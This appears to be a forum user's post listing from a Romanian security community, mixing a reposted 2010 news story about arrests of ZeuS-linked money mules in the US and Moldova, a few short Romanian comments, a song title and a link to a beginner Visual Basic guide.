  20. Authorities Nab More ZeuS-Related Money Mules Authorities in the United States and Moldova apprehended at least eight individuals alleged to have helped launder cash for an international cyber crime gang that stole more than $70 million from small to mid-sized organizations in recent months. In Wisconsin, police arrested two young men who were wanted as part of a crackdown in late September on money mules who were in the United States on J1 student visas. The men, both 21 years old, are thought to have helped transfer money overseas that was stolen from U.S. organizations with the help of malicious software planted by attackers in Eastern Europe. Dorin Codreanu and Lilian Adam, both originally from Moldova, are being transferred to New York, where they were charged on Sept. 30 in connection with the international money laundering scheme (hat tip to Sophos). In related news, the government of Moldova’s Specialized Services Center for Combating Economic Crimes and Corruption (CCECC) announced late last month that it had detained six individuals suspected of helping the same international ZeuS gang launder money. All six of those detained were bank employees, and one worked at the Bank of Moldova. According to Moldovan authorities, the suspects allegedly specialized in intercepting Western Union and MoneyGram payments that mules had sent to Eastern Europe after receiving bank transfers from organizations victimized by the ZeuS Trojan. Altogether, Moldovan prosecutors are looking at 12 suspects, including a government official who is alleged to have provided the group with copies of ID cards needed to open bank accounts. That nation’s anti-corruption center said it has conducted over 30 searches at detainees’ houses, and seized at least $300,000, a gun, and two luxury cars. Eleven of the 37 money mules charged in September in connection with these attacks are still at large. Photos of the suspects are available at this alert posted by the FBI. Sursa: http://krebsonsecurity.com/2010/11/authorities-nab-more-zeus-related-money-mules/
  21. Nytro

    Cati ani ai?

    Imi plac rezultatele votarii. Ar fi de preferat sa posteze si cei mai "in varsta" (nu prea o fac), nu numai cei mai "tineri".
  22. Ideea in sine e buna, dar nu imi place cum evolueaza lucrurile.
  23. Florin Salam - V-am facut-o
  24. Tier One: Introduction to the Visual Basic Programming Language This beginner's guide is designed for people with little or no prior knowledge of computer languages, who want to learn to program using the Visual Basic language. We'll cover language syntax and basic constructs with plenty of examples. http://msdn.microsoft.com/en-us/beginner/bb308774.aspx
×
×
  • Create New...